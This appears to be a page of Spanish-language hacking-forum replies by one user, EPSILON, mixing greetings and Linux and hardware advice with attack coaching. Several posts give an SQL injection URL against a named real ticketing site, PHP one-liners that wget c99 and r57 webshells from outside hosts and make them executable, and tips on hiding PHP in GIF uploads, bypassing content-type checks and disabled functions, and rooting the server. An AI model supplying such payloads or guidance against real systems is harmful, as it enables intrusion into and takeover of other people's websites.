Espero que hayas tenido un lindo dia compañero @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ! un poco tarde pero la intención es la que cuenta no? , Gracias por todo el tiempo que le dedicas a la comunidad se valora mucho todo!.

Saludos!, EPSILON.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Si no podes ver la tabla users de la DB mysql es porque muy probablemente no tengas los permisos suficientes para eso, por lo que ya podes dar por echo que el usuario que esta corriendo en la DB no es root o tiene permisos restringidos.

Saludos!, EPSILON.

Bienvenido de nuevo @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ! Puede ser que hace unos 6 años andabas por el foro de remoteexecution con el nick TrueneX?, el mio era Thanatos.

Saludos!, EPSILON.

Perfecto @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ! así tienen que ser los reportes en "Hacking show off" con el payload explotando la falla.

Saludos!, EPSILON.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que buenos tiempos los de Formar, yo también los veía de chico y me quedaba viéndolos y esperando el prox. capitulo, se podría decir que en cierta forma son los inicios de mi curiosidad por la informática en general y como bien dices después uno se va por las ramas, jajaja.

Saludos!, EPSILON.

Yo hasta el dia de hoy me sigo riendo y eso que lo escuche hace 1 año casi, no lo puedo creer y encima lo termino admitiendo, jajaja.

Sin palabras, jajaja.

Funcionan todos los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta menos el 4 y el 5.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

Sinceramente no he usado ninguna de las distros que figuran en esa lista, actualmente estoy con Ubuntu y anteriormente con Debian que a mi parecen son distros muy buenas y estables, ahora bien Stallman tiene razón al decir que no son 100% libres, pero las distribuciones no te obligan a usar un software de tercero o driver privativo, lo que sucede es que esto aveces es la mejor opción,por que por ejemplo en mi caso mi placa wifi no tiene soporte y no es reconocida fácilmente por el OS, y tengo que recurrir al driver privativo que me ofrecen para no liarmela mas, en ningún momento se me obligo a instalar nada privativo y siempre se me aviso cuando el sistema lo recomendaba, en mi opinión lo que pides ya seria algo un poco extremista el recurrir a distros con soporte nulo o casi nulo porque son 100% open source, pero si esa es tu postura yo te diría que bajes las que te parezcan buenas y las prubes en LiveCD.

PD: Trisquel y Dragora tienen buena pinta.

Saludos!, EPSILON

De nada compañero! para eso estamos, ahora si quieres puedes subir mas fácilmente otra webshell que te quede mas cómoda desde el upload de esa webshell que subiste.
Ahora si puede dar por solucionado este post, cualquier otra duda no dudes en postearla acá y te ayudaremos.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta proba subiendo este code tal cual y ejecutalo:

<?php
system('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
?>

luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se podría decir que ya tenes comprometida la web por que tenes shell y podes tirar comandos, ahora bien la webshell si se subio y se le dio permisos pero por alguna razón el servidor no la interpreta, anda jugando y probando con otras webshells como hiciste con las imágenes, esto es asi es probar y probar alternativas hasta que se de, también como dices podrías crear un rfi e incluir la shell desde ahi.

Saludos!, EPSILON

Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

<?php
passthru('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
?>

Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON

Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:

<?php
phpinfo();
?>

y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Link actualizado.


Saludos!, EPSILON

Lo que comento @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta funciona a la perfección, debería funcionarte si o si. Lógicamente tienes que tener instalado git.

Saludos!, EPSILON

Lo quieres conectar como un disco externo para poder testear cual es la falla con algun software, no? bien, la verdad es raro tendría que reconocértelo sin problemas en todo caso prueba en otra pc y si no lo reconoce empiezo a creer que es un error físico y en ese caso anda pensando en comprar otro xD.

PD: Proba en otra PC de las dos formas via USB y por Sata.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aaa bien ahora entendí a que viene tu duda, como en un principio decías que gparted te generaba un error pensé que era eso, pero no es normal que no te funcione bien el sistema de booteo puesto que nada tiene que ver con particiones y el disco rígido en general, el mismo esta integrado en una memoria integrada a la placa madre y con un software independiente del resto que carga al iniciar la pc (BIOS),  me tiro por tres cosas: o las isos que tenes están mal grabadas (por eso te recomendé que probes bootear por dvd o usb para descartar fallos ahí),  tenes dañada la lectora de dvd o los puertos usb (proba intercambiando los métodos en cada booteo) ó tenes dañada la bios y vas a tener que flashar el firmware de la misma (bajate la actualizacion correspondiente a la tuya y proba, ojo que si lo haces mal podes dañarla para siempre).

PD: mire el error por internet y es un error del tipo kernel panic en sistemas de 64 bits que tienen el nuevo kernel en su version 4.2, por que si tu cpu tiene mas de 1 nucleo (que es lo normal en esta epoca)  falla al inciar, esto no psas en sistemas x86 con un kernel mas viejo. OJO!, me llamo la atencion que no podas instalar un sistema nuevo porque tengas este error ya que es un error del mismo sistema Linux y nada tiene que ver con la BIOs y el booteo, revisa lo que te deje más arriba igual.

Saludos!